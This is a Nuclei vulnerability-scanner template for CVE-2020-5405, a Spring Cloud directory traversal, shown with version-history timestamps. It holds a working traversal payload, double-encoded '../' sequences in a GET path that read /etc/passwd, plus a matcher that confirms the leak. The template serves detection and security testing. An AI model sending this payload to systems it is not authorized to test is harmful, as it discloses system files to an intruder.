nuclei-templates/cves/2020/CVE-2020-5405.yaml

23 lines
514 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
author: Harsh Bothra
2020-08-31 18:34:29 +00:00
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-5405
tags: cve,cve2020,traversal,springcloud
requests:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
2020-07-06 17:10:05 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2020-07-06 17:10:05 +00:00
- type: regex
regex:
- "root:[x*]:0:0:"
part: body